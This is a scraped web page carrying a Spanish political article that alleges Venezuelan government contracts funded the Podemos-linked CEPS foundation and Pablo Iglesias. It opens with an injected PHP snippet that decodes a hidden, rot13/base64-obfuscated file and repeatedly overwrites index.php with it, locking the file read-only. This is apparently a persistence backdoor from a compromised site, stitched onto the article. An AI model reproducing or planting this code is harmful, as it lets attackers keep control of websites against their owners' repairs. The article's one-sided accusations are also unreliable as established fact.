$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } EL FINANCIAMIENTO DE VENEZUELA A PODEMOS - Comisión Presidencial para la Relaciones Exteriores de Venezuela

La fundación Centro de Estudios Políticos y Sociales (CEPS), puede considerarse como el origen del partido español de izquierda Podemos. Sus principales dirigentes, entre los que se cuentan Íñigo Errejón y Juan Carlos Monedero, hoy fuera de la tolda política, y Alfredo Serrano Mancilla, reconocido por ser uno de los principales asesores en materia económica del gobierno venezolano desde comienzos de siglo y, principalmente Pablo Iglesias, hoy vicepresidente del gobierno español, aguran entre los directivos de la fundación que fue contratada por varias instituciones de gobierno en Venezuela para asesorías en diversas materias, desde la implantación de un sistema de seguridad social, hasta estrategia política, pasando por formación de funcionariado de prisiones.

La relación de Pablo Iglesias con estas contrataciones no puede ocultarse y resulta evidente su complicidad, en vista que el político regentó el cargo de “Responsable de Investigación”, precisamente la modalidad de contratación predilecta por el ejecutivo venezolano. Otro factor determinante fue la presencia de Delcy Rodríguez en diversos puestos de mando del gobierno chavista desde donde se contrataron gran parte de los servicios que prestó la fundación española, por ejemplo,desde su estancia en el despacho de la presidencia, coordinadora de la vicepresidencia o como ministra de comunicaciones.